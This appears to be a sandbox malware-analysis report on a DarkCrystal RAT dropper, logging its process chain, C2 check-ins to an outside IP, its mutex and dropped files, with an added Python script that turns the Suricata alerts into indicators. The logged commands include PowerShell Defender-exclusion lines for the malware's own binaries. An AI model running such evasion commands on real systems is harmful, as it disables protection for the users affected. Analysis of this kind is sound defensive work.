Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\DCobxod.exe; Code function: 0_2_0041A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0041A69B
Source: C:\Users\user\Desktop\DCobxod.exe; Code function: 0_2_0042C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0042C220
Source: C:\Users\user\Desktop\DCobxod.exe; Code function: 0_2_0043B348 FindFirstFileExA,0_2_0043B348
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user\AppData
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Browserhost\intoHostperf.exe; File opened: C:\Users\user\Desktop\desktop.ini

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49977 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49975 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49985 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49983 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49979 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49978 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49883 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49976 -> 104.21.16.1:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49984 -> 104.21.16.1:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F322057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D60E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000025.00000002.2369596905.000001FA1F3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2376696020.0000018831551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2388767348.000001F321E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2365307352.0000021200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2392325906.00000266D5EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2387240669.0000026C86DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002E.00000002.2387240669.0000026C86FE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000025.00000002.3566072235.000001FA2F442000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3560722723.00000188415C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3658740725.0000021210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3607787689.00000266E5F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
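The twelve Suricata rows above are one C2 observation repeated across twelve short-lived TCP connections (source ports 49883 and 49975 through 49985, all to 104.21.16.1:80). As an added example, not part of the Joe Sandbox report, the Python below parses rows in exactly this shape, collapses them per rule and destination, and emits the destination as a blockable indicator. The sample rows are constructed from this section's own lines, with one non-alert row included to show it is skipped; the function names are this example's own.

```python
"""Parse and summarise Suricata alert rows in the form a Joe Sandbox report prints them."""
import re
from collections import defaultdict

# "Suricata IDS: <sid> - Severity <n> - <signature> : <src>:<sport> -> <dst>:<dport>"
ALERT_RE = re.compile(
    r"Suricata IDS:\s*(?P<sid>\d+)\s*-\s*Severity\s*(?P<severity>\d+)\s*-\s*(?P<signature>.+?)\s*:\s*"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s*->\s*(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)"
)


def parse_alerts(lines):
    """Return one dict per line that carries a Suricata alert; other report rows are skipped."""
    alerts = []
    for line in lines:
        m = ALERT_RE.search(line)
        if not m:
            continue
        alert = m.groupdict()
        for key in ("sid", "severity", "sport", "dport"):
            alert[key] = int(alert[key])
        alerts.append(alert)
    return alerts


def summarise(alerts):
    """Group by (sid, destination) so a dozen check-in rows collapse to one observation."""
    groups = defaultdict(list)
    for alert in alerts:
        groups[(alert["sid"], alert["dst"], alert["dport"])].append(alert)
    summary = []
    for (sid, dst, dport), hits in sorted(groups.items()):
        summary.append({
            "sid": sid,
            "severity": hits[0]["severity"],
            "signature": hits[0]["signature"],
            "dst": f"{dst}:{dport}",
            "count": len(hits),
            "src_ports": sorted(hit["sport"] for hit in hits),  # one new port per check-in
        })
    return summary


def network_iocs(summary, priority=1):
    """Destination ip:port values from rules at the given Suricata priority or better (1 is highest)."""
    return sorted({entry["dst"] for entry in summary if entry["severity"] <= priority})


# Constructed sample rows, transcribed from this report's Networking section.
ROWS = [
    "Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:%d -> 104.21.16.1:80" % port
    for port in (49977, 49981, 49975, 49985, 49983, 49980, 49979, 49978, 49883, 49982, 49976, 49984)
] + ["Source: C:\\Windows\\System32\\cmd.exe | Process created: C:\\Windows\\System32\\PING.EXE ping -n 10 localhost"]

if __name__ == "__main__":
    for entry in summarise(parse_alerts(ROWS)):
        print(f'{entry["sid"]} sev{entry["severity"]} {entry["dst"]} x{entry["count"]} {entry["signature"]}')
    print("block:", network_iocs(summarise(parse_alerts(ROWS))))
```

The rule fires on the POST body, not on the address, so the destination alone is a weak indicator if the host sits behind shared hosting; pair it with the HTTP Host header and URI from the pcap before pushing it to a blocklist.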

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00416FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW | 0_2_00416FAA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041848E | 0_2_0041848E
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004140FE | 0_2_004140FE
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00424088 | 0_2_00424088
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004200B7 | 0_2_004200B7
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00427153 | 0_2_00427153
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004351C9 | 0_2_004351C9
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004262CA | 0_2_004262CA
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004132F7 | 0_2_004132F7
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004243BF | 0_2_004243BF
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0043D440 | 0_2_0043D440
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041F461 | 0_2_0041F461
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041C426 | 0_2_0041C426
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004277EF | 0_2_004277EF
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041286B | 0_2_0041286B
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0043D8EE | 0_2_0043D8EE
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_004419F4 | 0_2_004419F4
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041E9B7 | 0_2_0041E9B7
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00426CDC | 0_2_00426CDC
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00423E0B | 0_2_00423E0B
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041EFE2 | 0_2_0041EFE2
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00434F9A | 0_2_00434F9A
Source: C:\Browserhost\intoHostperf.exe | Code function: 5_2_00007FF848D90D47 | 5_2_00007FF848D90D47
Source: C:\Browserhost\intoHostperf.exe | Code function: 5_2_00007FF848D90E43 | 5_2_00007FF848D90E43
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: String function: 0042F5F0 appears 31 times
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: String function: 0042EC50 appears 56 times
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: String function: 0042EB78 appears 39 times
Source: TkyvVenI.log.5.dr, CdhQCsIu.log.5.dr, bnxVycYy.log.5.dr, QuHEOinP.log.5.dr, zmrZuvIB.log.5.dr, pEXJLSDT.log.5.dr, XrvErxiE.log.5.dr, DaJYXsXp.log.5.dr, urpInPSH.log.5.dr, kIWsDnNZ.log.5.dr, NzFoXiJZ.log.5.dr, GTYGJoJn.log.5.dr, xpPRZvtG.log.5.dr, nBlbpjyY.log.5.dr, WuUwVxTJ.log.5.dr, TBFNkAhL.log.5.dr, AkShQvXv.log.5.dr, jcBCwIrh.log.5.dr, ZuimMgmz.log.5.dr, QQZxdmXS.log.5.dr, HhGhtKRk.log.5.dr, wtcqJyWC.log.5.dr (22 dropped files, one report row each, identical detail) | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DCobxod.exe, 00000000.00000003.2057370012.000000000322C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs DCobxod.exe
Source: DCobxod.exe, 00000000.00000003.2057370012.000000000322C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs DCobxod.exe
Source: DCobxod.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs DCobxod.exe
Source: DCobxod.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@56/79@0/0
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_00416C74 GetLastError,FormatMessageW | 0_2_00416C74
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0042A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree | 0_2_0042A6C2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP
Source: C:\Browserhost\intoHostperf.exe | File created: C:\Users\user\Desktop\NzFoXiJZ.log
Source: C:\Browserhost\intoHostperf.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Browserhost\intoHostperf.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-l6SyUDRxjaImQy2wOPXg
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3304:120:WilError_03
Source: C:\Browserhost\intoHostperf.exe | File created: C:\Users\user\AppData\Local\Temp\y4s1cmk0
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
Source: unknown | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
Source: unknown | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
Source: C:\Users\user\Desktop\DCobxod.exe | Command line argument: sfxname | 0_2_0042DF1E
Source: C:\Users\user\Desktop\DCobxod.exe | Command line argument: sfxstime | 0_2_0042DF1E
Source: C:\Users\user\Desktop\DCobxod.exe | Command line argument: STARTDLG | 0_2_0042DF1E
Source: C:\Users\user\Desktop\DCobxod.exe | Command line argument: xzF | 0_2_0042DF1E
Source: DCobxod.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DCobxod.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Browserhost\intoHostperf.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical rows in the report, one per process launched through WMI)
Source: C:\Users\user\Desktop\DCobxod.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\DCobxod.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DCobxod.exe | Virustotal: Detection: 55%
Source: DCobxod.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\DCobxod.exe | File read: C:\Users\user\Desktop\DCobxod.exe
Source: unknown | Process created: C:\Users\user\Desktop\DCobxod.exe "C:\Users\user\Desktop\DCobxod.exe"
Source: C:\Users\user\Desktop\DCobxod.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
Source: unknown | Process created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
Source: unknown | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe C:\Users\Default\NetHood\explorer.exe
Source: unknown | Process created: C:\Browserhost\LaSqLWtOcizKrlm.exe C:\Browserhost\LaSqLWtOcizKrlm.exe
Source: unknown | Process created: C:\Browserhost\LaSqLWtOcizKrlm.exe C:\Browserhost\LaSqLWtOcizKrlm.exe
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\SoftwareDistribution\winlogon.exe "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
Source: unknown | Process created: C:\ProgramData\SoftwareDistribution\winlogon.exe "C:\Users\All Users\SoftwareDistribution\winlogon.exe"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe C:\Users\Default\NetHood\explorer.exe
Source: unknown | Process created: C:\Browserhost\intoHostperf.exe C:\Browserhost\intoHostperf.exe
Source: unknown | Process created: C:\Browserhost\intoHostperf.exe C:\Browserhost\intoHostperf.exe
Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DCobxod.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
Source: C:\Browserhost\intoHostperf.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"Jump to behavior
